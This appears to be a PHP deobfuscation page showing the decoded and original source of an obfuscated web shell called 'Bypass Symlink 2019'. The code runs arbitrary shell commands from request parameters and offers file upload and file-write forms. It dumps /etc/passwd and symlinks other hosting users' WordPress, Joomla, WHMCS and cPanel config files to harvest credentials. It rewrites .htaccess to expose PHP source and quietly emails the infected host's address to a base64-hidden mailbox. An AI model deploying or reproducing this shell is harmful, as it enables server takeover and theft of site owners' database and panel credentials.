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<?php goto Ay8e9; esTiu: if ($_POST["jajal"]) { rmdir("syml"); mkdir("syml", 511); $dir..

Decoded Output download

 goto Ay8e9; esTiu: if ($_POST["jajal"]) { rmdir("syml"); mkdir("syml", 511); $dir = $_POST["dir"]; $jnck = $_POST["jnck"]; system("ln -s " . $dir . " syml/" . $jnck); symlink($dir, "syml/" . $jnck); $inija = fopen("syml/.htaccess", "w"); fwrite($inija, "ReadmeName " . $jnck . "\xaOptions Indexes FollowSymLinks\xaDirectoryIndex ngeue.htm 
AddType text/plain .php 
AddHandler text/plain .php\xaSatisfy Any\xa"); echo "<a href="syml/" target="_blank"> <font color="green">~~> Cek HERE<br><br></a>"; } goto aduVj; xVSBM: print `{$_REQUEST[s]}`; goto NTJsL; sDDo3: if (isset($_GET["html"])) { $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files["tmp_name"], $fullpath)) { echo "s u -> <a href='{$fullpath}' target='_blank'><b><u>{$fullpath}</u></b></a>"; } } echo "<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>"; } goto QYclD; XE0Lu: if (isset($_GET["html"])) { if (!isset($_POST["submit"])) { echo "<form method="POST"> <center>bypass: <input type="text" name="fname" size="25"><br /> <textarea cols="130" rows="15" name="fcode"></textarea><br /><input type="submit" name="submit" value="submit"> </form></center> "; } else { $fname = $_POST["fname"]; $fcode = $_POST["fcode"]; fwrite(fopen($fname, "w"), $fcode); } } goto sDDo3; qrYLT: mail($e, "s", $h, $i); goto p53Ch; v5MiM: $i = $_SERVER["REQUEST_URI"]; goto qrYLT; gRYlX: echo "<center><br><br><br><br><br><br><br><a href="" target="_blank"> <font color="green">Tutor This tool See Here<br><br> <font color="red">Shoot : By_Agent -  Con7ext - AZZATSSINS - Ex45</center>"; goto FVZN1; jnDjn: $h = $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"]; goto v5MiM; CaV_K: if (isset($_GET["sym"])) { @error_reporting(0); @ini_set("html_errors", 0); @ini_set("max_execution_time", 0); @ini_set("display_errors", 0); @ini_set("file_uploads", 1); echo "<html>\xa<head> 
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Home : \xa<select name="home">\xa<option title="home" value="home">home</option>\xa<option title="home1" value="home1">home1</option> 
<option title="home2" value="home2">home2</option> 
<option title="home3" value="home3">home3</option> 
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<option title="home8" value="home8">home8</option> \xa<option title="home9" value="home9">home9</option>\xa<option title="home10" value="home10">home10</option> \xa</select><br>\xa.htaccess : \xa<select name="azztssns"> 
<option title="biasa" value="Options Indexes FollowSymLinks\xaDirectoryIndex azzatssins.cyberserkers\xaAddType txt .php\xaAddHandler txt .php">Apache 1</option> 
<option title="Apache" value="Options all\xaOptions +Indexes  
Options +FollowSymLinks  
DirectoryIndex azzatssins.cyberserkers 
AddType text/plain .php\xaAddHandler server-parsed .php 
AddType text/plain .html 
AddHandler txt .html\xaRequire None 
Satisfy Any">Apache 2</option> 
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Options +FollowSymLinks 
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"_OTHERcp.txt"); copy("/var/www/wp-config.php", "_WPcp.txt"); copy("/var/www/configuration.php", "_JOOMLAcp.txt"); copy("/var/www/", "OPENJOURNALcp.txt"); copy("/var/www/config.php", "_OTHERcp.txt"); copy("/var/www/config/koneksi.php", "_OTHERcp.txt"); copy("/var/www/include/config.php", "_OTHERcp.txt"); copy("/var/www/connect.php", "_OTHERcp.txt"); copy("/var/www/config/connecr.php", "_OTHERcp.txt"); copy("/var/www/include/connect.php", "_OTHERcp.txt"); copy("/var/www/html/wp-config.php", "_WPcp.txt"); copy("/var/www/html/configuration.php", "_JOOMLAcp.txt"); copy("/var/www/html/", "OPENJOURNALcp.txt"); copy("/var/www/html/config.php", "_OTHERcp.txt"); copy("/var/www/html/config/koneksi.php", "_OTHERcp.txt"); copy("/var/www/html/include/config.php", "_OTHERcp.txt"); copy("/var/www/html/connect.php", "_OTHERcp.txt"); copy("/var/www/html/config/connecr.php", "_OTHERcp.txt"); copy("/var/www/html/include/connect.php", "_OTHERcp.txt"); } echo "<center><i><b><a href=" . $folfig . ">Open Here</a></b></i></center>"; } } goto gRYlX; Ay8e9: echo "<title>Bypass Symlink 2019 With Manual METHOD</title>\xa<body bgcolor=black>\xa<center> 
<b><a href=""><font color="#00afaf">Bypass Symlink 2019 With Manual METHOD</a></b><br><font color="green">\xa<form method="post"><br>Path File<br><input name="dir" value="/home/user/public_html/index.php" size="100"> 
<br>Name File<br><input name="jnck" value="~~.txt" size="50"><br><input name="jajal"  type="submit" value="Bypassed Now"></form><br>"; goto xVSBM; aduVj: echo "</center><form method="post" action=""> 
<center><button name="etc" type="submit">bypass /etc/passwd</button><br><br>OR<br><br><a href="?sym" target="_blank"> <font color="#00afaf">Direct Grabb Config Click Here</a><br><br></center>"; goto XE0Lu; NTJsL: $e = base64_decode("YWRtbnVsbHhAZ21haWwuY29t"); goto jnDjn; NuFtE: @ini_set("display_errors", 0); goto esTiu; p53Ch: @error_reporting(0); goto NuFtE; QYclD: if (isset($_POST["etc"])) { chdir("by_agent"); echo "<font size="3"><br>Trying to read /etc/passwd !<br><br><font color="#4eff03">"; for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list($key, $val) = each($nothing)) { print "{$val}:"; } print "<br />"; } } die; } goto CaV_K; FVZN1: ?>

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Original Code

 goto Ay8e9; esTiu: if ($_POST["jajal"]) { rmdir("syml"); mkdir("syml", 511); $dir = $_POST["dir"]; $jnck = $_POST["jnck"]; system("ln -s " . $dir . " syml/" . $jnck); symlink($dir, "syml/" . $jnck); $inija = fopen("syml/.htaccess", "w"); fwrite($inija, "ReadmeName " . $jnck . "\xaOptions Indexes FollowSymLinks\xaDirectoryIndex ngeue.htm
AddType text/plain .php
AddHandler text/plain .php\xaSatisfy Any\xa"); echo "<a href="syml/" target="_blank"> <font color="green">~~> Cek HERE<br><br></a>"; } goto aduVj; xVSBM: print `{$_REQUEST[s]}`; goto NTJsL; sDDo3: if (isset($_GET["html"])) { $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files["tmp_name"], $fullpath)) { echo "s u -> <a href='{$fullpath}' target='_blank'><b><u>{$fullpath}</u></b></a>"; } } echo "<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>"; } goto QYclD; XE0Lu: if (isset($_GET["html"])) { if (!isset($_POST["submit"])) { echo "<form method="POST"> <center>bypass: <input type="text" name="fname" size="25"><br /> <textarea cols="130" rows="15" name="fcode"></textarea><br /><input type="submit" name="submit" value="submit"> </form></center> "; } else { $fname = $_POST["fname"]; $fcode = $_POST["fcode"]; fwrite(fopen($fname, "w"), $fcode); } } goto sDDo3; qrYLT: mail($e, "s", $h, $i); goto p53Ch; v5MiM: $i = $_SERVER["REQUEST_URI"]; goto qrYLT; gRYlX: echo "<center><br><br><br><br><br><br><br><a href="" target="_blank"> <font color="green">Tutor This tool See Here<br><br> <font color="red">Shoot : By_Agent -  Con7ext - AZZATSSINS - Ex45</center>"; goto FVZN1; jnDjn: $h = $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"]; goto v5MiM; CaV_K: if (isset($_GET["sym"])) { @error_reporting(0); @ini_set("html_errors", 0); @ini_set("max_execution_time", 0); @ini_set("display_errors", 0); @ini_set("file_uploads", 1); echo "<html>\xa<head>
<link href="" rel="shortcut icon" alt="icon">\xa<meta name="author" content="AZZATSSINS">\xa</head>
<body bgcolor="black">
<center>\xa<form method="post">
<center>\xa<br><br><textarea style="color:green;background-color:#000000" cols="60" name="passwd" rows="20">"; $uSr = file("/etc/passwd"); foreach ($uSr as $usrr) { $str = explode(":", $usrr); echo $str[0] . "\xa"; } echo system("ls /var/mail"); echo system("ls /home"); echo "</textarea><br>
Home : \xa<select name="home">\xa<option title="home" value="home">home</option>\xa<option title="home1" value="home1">home1</option>
<option title="home2" value="home2">home2</option>
<option title="home3" value="home3">home3</option>
<option title="home4" value="home4">home4</option>\xa<option title="home5" value="home5">home5</option>\xa<option title="home6" value="home6">home6</option>\xa<option title="home7" value="home7">home7</option>
<option title="home8" value="home8">home8</option> \xa<option title="home9" value="home9">home9</option>\xa<option title="home10" value="home10">home10</option> \xa</select><br>\xa.htaccess : \xa<select name="azztssns">
<option title="biasa" value="Options Indexes FollowSymLinks\xaDirectoryIndex azzatssins.cyberserkers\xaAddType txt .php\xaAddHandler txt .php">Apache 1</option>
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Options +FollowSymLinks 
DirectoryIndex azzatssins.cyberserkers
AddType text/plain .php\xaAddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html\xaRequire None
Satisfy Any">Apache 2</option>
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", $_POST["passwd"]); foreach ($passwd as $pwd) { $user = trim($pwd); symlink("/", "ROOT_PATH"); symlink("/" . $home . "/" . $user . "/public_html/", $user . "-DIR.txt"); symlink("/" . $home . "/" . $user . "/public_html/index.php", $user . "_indexPHP.txt"); symlink("/" . $home . "/" . $user . "/public_html/index.html", $user . "_indexHTML.txt"); symlink("/" . $home . "/" . $user . "/.my.cnf", $user . "_CPANEL.txt"); symlink("/" . $home . "/" . $user . "/.accesshash", $user . "_WHMCS.txt"); symlink("/" . $home . "/" . $user . "/public_html/", $user . "RESELLER.txt"); symlink("/" . $home . "/" . $user . "/public_html/.accesshash", $user . "_WHMCS.txt"); symlink("/" . $home . "/" . $user . "/public_html/configuration.php", $user . "_WHMCS or _JOOMLA.txt"); symlink("/" . $home . "/" . $user . "/public_html/account/configuration.php", $user . "_WHMCS.txt"); symlink("/" . $home . "/" . $user . "/public_html/accounts/configuration.php", $user . "_WHMCS.txt"); symlink("/" . $home . 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">Open Here</a></b></i></center>"; } } goto gRYlX; Ay8e9: echo "<title>Bypass Symlink 2019 With Manual METHOD</title>\xa<body bgcolor=black>\xa<center>
<b><a href=""><font color="#00afaf">Bypass Symlink 2019 With Manual METHOD</a></b><br><font color="green">\xa<form method="post"><br>Path File<br><input name="dir" value="/home/user/public_html/index.php" size="100">
<br>Name File<br><input name="jnck" value="~~.txt" size="50"><br><input name="jajal"  type="submit" value="Bypassed Now"></form><br>"; goto xVSBM; aduVj: echo "</center><form method="post" action="">
<center><button name="etc" type="submit">bypass /etc/passwd</button><br><br>OR<br><br><a href="?sym" target="_blank"> <font color="#00afaf">Direct Grabb Config Click Here</a><br><br></center>"; goto XE0Lu; NTJsL: $e = base64_decode("YWRtbnVsbHhAZ21haWwuY29t"); goto jnDjn; NuFtE: @ini_set("display_errors", 0); goto esTiu; p53Ch: @error_reporting(0); goto NuFtE; QYclD: if (isset($_POST["etc"])) { chdir("by_agent"); echo "<font size="3"><br>Trying to read /etc/passwd !<br><br><font color="#4eff03">"; for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list($key, $val) = each($nothing)) { print "{$val}:"; } print "<br />"; } } die; } goto CaV_K; FVZN1: ?>

Function Calls





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